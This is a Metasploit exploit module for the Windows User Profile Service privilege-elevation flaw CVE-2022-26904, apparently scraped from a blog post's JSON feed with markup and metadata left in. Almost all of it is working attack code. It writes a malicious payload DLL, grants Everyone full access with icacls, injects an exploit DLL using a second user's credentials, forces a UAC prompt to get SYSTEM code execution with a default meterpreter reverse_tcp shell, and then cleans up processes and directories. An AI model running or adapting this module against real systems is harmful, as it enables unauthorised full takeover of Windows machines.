##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n
class MetasploitModule < Msf::Exploit::Local
\nRank = ExcellentRanking<\/p>\n
include Msf::Post::File
\ninclude Msf::Exploit::FileDropper
\ninclude Msf::Post::Windows::FileInfo
\ninclude Msf::Post::Windows::Priv
\ninclude Msf::Post::Windows::Process
\ninclude Msf::Post::Windows::ReflectiveDLLInjection
\ninclude Msf::Exploit::EXE # Needed for generate_payload_dll
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n
def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n{
\n‘Name’ => ‘User Profile Arbitrary Junction Creation Local Privilege Elevation’,
\n‘Description’ => %q{
\nThe user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability
\nin its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of
\nthe junctions it tries to link together.<\/p>\n
Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a
\nUAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.<\/p>\n
Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as
\nCVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for
\nCVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it
\nas CVE-2022-26904.<\/p>\n
It is important to note that the credentials supplied for the second user to log in as in this exploit must be
\nthose of a normal non-admin user and these credentials must also corralate with a user who has already logged in
\nat least once before. Additionally the current user running the exploit must have UAC set to the highest level,
\naka “Always Notify Me When”, in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that
\n“Always Notify Me When” is the default UAC setting on common Windows installs, so this would only affect instances
\nwhere this setting has been changed either manually or as part of the installation process.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘KLINIX5’, # Aka Abdelhamid Naceri. Original PoC w Patch Bypass
\n‘Grant Willcox’ # Metasploit module + Tweaks to PoC
\n],
\n‘Arch’ => [ ARCH_X64 ],
\n‘Platform’ => ‘win’,
\n‘SessionTypes’ => [ ‘meterpreter’ ],
\n‘Targets’ => [
\n[ ‘Windows 11’, { ‘Arch’ => ARCH_X64 } ]\n],
\n‘References’ => [
\n[‘CVE’, ‘2022-26904’],
\n[‘URL’, ‘https:\/\/github.com\/rmusser01\/SuperProfile’], # Original link was at https:\/\/github.com\/klinix5\/SuperProfile\/ but was taken down. This is a backup.
\n[‘URL’, ‘https:\/\/web.archive.org\/web\/20220222105232\/https:\/\/halove23.blogspot.com\/2022\/02\/blog-post.html’], # Original blog post
\n[‘URL’, ‘https:\/\/github.com\/klinix5\/ProfSvcLPE\/blob\/main\/write-up.docx’] # Discussion of previous iterations of this bug providing insight into patched functionality.
\n],
\n‘DisclosureDate’ => ‘2022-03-17’, # Date MSRC supplied CVE number, bug is not patched atm.
\n‘DefaultTarget’ => 0,
\n‘Notes’ => {
\n‘Stability’ => [ CRASH_SAFE, ],
\n‘Reliability’ => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.
\n‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n},
\n‘DefaultOptions’ => {
\n‘EXITFUNC’ => ‘thread’,
\n‘PAYLOAD’ => ‘windows\/x64\/meterpreter\/reverse_tcp’,
\n‘WfsDelay’ => 300
\n},
\n‘AKA’ => [ ‘SuperProfile’ ]\n}
\n)
\n)<\/p>\n
register_options([
\nOptString.new(‘LOGINUSER’, [true, ‘Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!’]),
\nOptString.new(‘LOGINDOMAIN’, [true, ‘Domain that the LOGINUSER belongs to. Ensures we log into the right domain.’, ‘.’]),
\nOptString.new(‘LOGINPASSWORD’, [true, ‘Password for the secondary normal privileged user to log in as’])
\n])
\nend<\/p>\n
def check
\nsysinfo_value = sysinfo[‘OS’]\n
if sysinfo_value !~ \/windows\/i
\n# Non-Windows systems are definitely not affected.
\nreturn CheckCode::Safe(‘Target is not a Windows system, so it is not affected by this vulnerability!’)
\nend<\/p>\n
# see https:\/\/docs.microsoft.com\/en-us\/windows\/release-information\/
\nunless sysinfo_value =~ \/(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)\/
\nreturn CheckCode::Safe(‘Target is not running a vulnerable version of Windows!’)
\nend<\/p>\n
print_status(‘Checking if PromptOnSecureDesktop mitigation applied…’)
\nreg_key = ‘HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System’
\nreg_val = ‘PromptOnSecureDesktop’
\nbegin
\nroot_key, base_key = @session.sys.registry.splitkey(reg_key)
\nvalue = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)
\nrescue Rex::Post::Meterpreter::RequestError => e
\nreturn CheckCode::Unknown(“Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}”)
\nend<\/p>\n
if value.data == 0
\nreturn CheckCode::Safe(‘PromptOnSecureDesktop is set to 0, mitigation applied!’)
\nelsif value.data == 1
\nprint_good(‘PromptOnSecureDesktop is set to 1, should be safe to proceed!’)
\nelse
\nreturn CheckCode::Unknown(“PromptOnSecureDesktop was not set to a known value, are you sure the target system isn’t corrupted?”)
\nend<\/p>\n
_major, _minor, build, revision, _branch = file_version(‘C:\\\\Windows\\\\System32\\\\ntdll.dll’)
\nmajor_minor_version = sysinfo_value.match(\/\\((\\d{1,2}\\.\\d)\/)
\nif major_minor_version.nil?
\nreturn CheckCode::Unknown(“Could not retrieve the major n minor version of the target’s build number!”)
\nend<\/p>\n
major_minor_version = major_minor_version[1]\nbuild_num = “#{major_minor_version}.#{build}.#{revision}”<\/p>\n
build_num_gemversion = Rex::Version.new(build_num)<\/p>\n
# Build numbers taken from https:\/\/www.gaijin.at\/en\/infos\/windows-version-numbers and from
\n# https:\/\/en.wikipedia.org\/wiki\/Windows_11_version_history and https:\/\/en.wikipedia.org\/wiki\/Windows_10_version_history
\nif (build_num_gemversion >= Rex::Version.new(‘10.0.22000.0’)) # Windows 11
\nreturn CheckCode::Appears(‘Vulnerable Windows 11 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.20348.0’)) # Windows Server 2022
\nreturn CheckCode::Appears(‘Vulnerable Windows 11 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.19044.0’)) # Windows 10 21H2
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 21H2 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.19043.0’)) # Windows 10 21H1
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 21H1 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.19042.0’)) # Windows 10 20H2 \/ Windows Server, Version 20H2
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 20H2 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.19041.0’)) # Windows 10 v2004 \/ Windows Server v2004
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v2004 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.18363.0’)) # Windows 10 v1909 \/ Windows Server v1909
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1909 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.18362.0’)) # Windows 10 v1903
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1903 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.17763.0’)) # Windows 10 v1809 \/ Windows Server 2019 v1809
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1809 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.17134.0’)) # Windows 10 v1803
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1803 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.16299.0’)) # Windows 10 v1709
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1709 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.15063.0’)) # Windows 10 v1703
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1703 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.14393.0’)) # Windows 10 v1607 \/ Windows Server 2016 v1607
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1607 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.10586.0’)) # Windows 10 v1511
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1511 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘10.0.10240.0’)) # Windows 10 v1507
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 10 v1507 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘6.3.9600.0’)) # Windows 8.1\/Windows Server 2012 R2
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 8.1\/Windows Server 2012 R2 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘6.2.9200.0’)) # Windows 8\/Windows Server 2012
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 8\/Windows Server 2012 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘6.1.7601.0’)) # Windows 7 SP1\/Windows Server 2008 R2 SP1
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 7\/Windows Server 2008 R2 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘6.1.7600.0’)) # Windows 7\/Windows Server 2008 R2
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Vulnerable Windows 7\/Windows Server 2008 R2 build detected!’)
\nelsif (build_num_gemversion >= Rex::Version.new(‘6.0.6002.0’)) # Windows Server 2008 SP2
\ntarget_not_presently_supported
\nreturn CheckCode::Appears(‘Windows Server 2008\/Windows Server 2008 SP2 build detected!’)
\nelse
\nreturn CheckCode::Safe(‘The build number of the target machine does not appear to be a vulnerable version!’)
\nend
\nend<\/p>\n
def target_not_presently_supported
\nprint_warning(‘This target is not presently supported by this exploit. Support may be added in the future!’)
\nprint_warning(‘Attempts to exploit this target with this module WILL NOT WORK!’)
\nend<\/p>\n
def check_target_is_running_supported_windows_version
\nif !sysinfo[‘OS’].include?(‘Windows’)
\nfail_with(Failure::NotVulnerable, ‘Target is not running Windows!’)
\nelsif !sysinfo[‘OS’].include?(‘Windows 10’) && !sysinfo[‘OS’].include?(‘Windows 11’) && !sysinfo[‘OS’].include?(‘Windows Server 2022’)
\nfail_with(Failure::NoTarget, ‘Target is running Windows, its not a version this module supports! Bailing…’)
\nend
\nend<\/p>\n
def exploit
\n# Step 1: Check target environment is correct.
\nprint_status(‘Step #1: Checking target environment…’)
\nif is_system?
\nfail_with(Failure::None, ‘Session is already elevated’)
\nend
\ncheck_target_is_running_supported_windows_version<\/p>\n
# Step 2: Generate the malicious DLL and upload it to a temp location.
\npayload_dll = generate_payload_dll
\nprint_status(“Payload DLL is #{payload_dll.length} bytes long”)
\ntemp_directory = session.sys.config.getenv(‘%TEMP%’)
\nmalicious_dll_location = “#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll”
\nprint_status(“Writing malicious DLL to #{malicious_dll_location}”)
\nwrite_file(malicious_dll_location, payload_dll)<\/p>\n
print_status(‘Marking DLL as full access for Everyone so that there are no access issues as the secondary user…’)
\ncmd_exec(“icacls #{malicious_dll_location} \/grant Everyone:(F)”)
\nregister_file_for_cleanup(malicious_dll_location)<\/p>\n
# Register the directories we create for cleanup
\nregister_dir_for_cleanup(‘C:\\\\Windows\\\\System32\\\\Narrator.exe.Local’)
\nregister_dir_for_cleanup(‘C:\\\\Users\\\\TEMP’)<\/p>\n
# Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.
\nprint_status(‘Step #3: Loading the exploit DLL to run the main exploit…’)
\nlibrary_path = ::File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2022-26904’, ‘CVE-2022-26904.dll’)
\nlibrary_path = ::File.expand_path(library_path)<\/p>\n
dll_info_parameter = datastore[‘LOGINUSER’].to_s + ‘||’ + datastore[‘LOGINDOMAIN’].to_s + ‘||’ + datastore[‘LOGINPASSWORD’].to_s + ‘||’ + malicious_dll_location.to_s<\/p>\n
@session_obtained_bool = false
\n# invoke the exploit, passing in the address of the payload that
\n# we want invoked on successful exploitation, and the credentials for the second user.
\nexecute_dll(library_path, dll_info_parameter)<\/p>\n
print_good(‘Exploit finished, wait for (hopefully privileged) payload execution to complete.’)
\nprint_warning(“Cleanup may not occur automatically if you aren’t using a Meterpreter payload so make sure to run the following command upon session completion:”)
\nprint_warning(‘taskkill \/IM “consent.exe” \/F || taskkill \/IM “narrator.exe” \/F || taskkill \/IM “narratorquickstart.exe” \/F || taskkill \/IM “msiexec.exe” || rmdir \/q \/s C:\\Users\\TEMP || rmdir \/q \/s C:\\Windows\\System32\\Narrator.exe.local’)
\nprint_warning(‘You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!’)<\/p>\n
print_status(‘Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.’)
\nprint_status(‘If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.’)
\nsleep(60)
\nif (@session_obtained_bool == false)
\n# Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself
\n# triggering the UAC prompt won’t work at times so this is the best way of solving this issue for cases where this happens.
\nbegin
\ncmd_exec(‘UserAccountControlSettings.exe’)
\nrescue Rex::TimeoutError
\nprint_warning(‘Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!’)
\nend
\nend
\nend<\/p>\n
def on_new_session(new_session)
\n@session_obtained_bool = true
\nold_session = @session
\n@session = new_session
\nif new_session.type == ‘meterpreter’
\nconsent_pids = pidof(‘consent.exe’)
\nfor id in consent_pids
\n@session.sys.process.kill(id)
\nend
\nsleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes
\n# can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.
\nnarrator_pids = pidof(‘Narrator.exe’)
\nfor id in narrator_pids
\n@session.sys.process.kill(id)
\nend
\nnarrator_pids = pidof(‘NarratorQuickStart.exe’)
\nfor id in narrator_pids
\n@session.sys.process.kill(id)
\nend
\nnarrator_pids = pidof(‘msiexec.exe’)
\nfor id in narrator_pids
\n@session.sys.process.kill(id)
\nend
\nelse
\n# If it is another session type such as shell or PowerShell we will need to execute the command
\n# normally using cmd_exec() to cleanup, as it doesn’t seem we have a built in option to kill processes
\n# by name or PIDs as library functions for these session types.
\ncmd_exec(‘taskkill \/IM “consent.exe” \/F’)
\nsleep(5)
\ncmd_exec(‘taskkill \/IM “narrator.exe” \/F’)
\ncmd_exec(‘taskkill \/IM “narratorquickstart.exe” \/F’)
\ncmd_exec(‘taskkill \/IM “msiexec.exe” \/F’)
\nend<\/p>\n
rm_rf(‘C:\\\\Windows\\\\System32\\\\Narrator.exe.local’)
\nfor _i in range(1..3)
\nrm_rf(‘C:\\\\Users\\\\TEMP’) # Try deleting this 3 times just to be sure.
\nend
\n@session = old_session
\nsuper
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"
## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Exploit::EXE # Needed for generate_payload_dll prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, { ‘Name’ => ‘User Profile Arbitrary Junction Creation Local …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23024","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23024","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23024"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23024\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23024"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23024"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23024"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}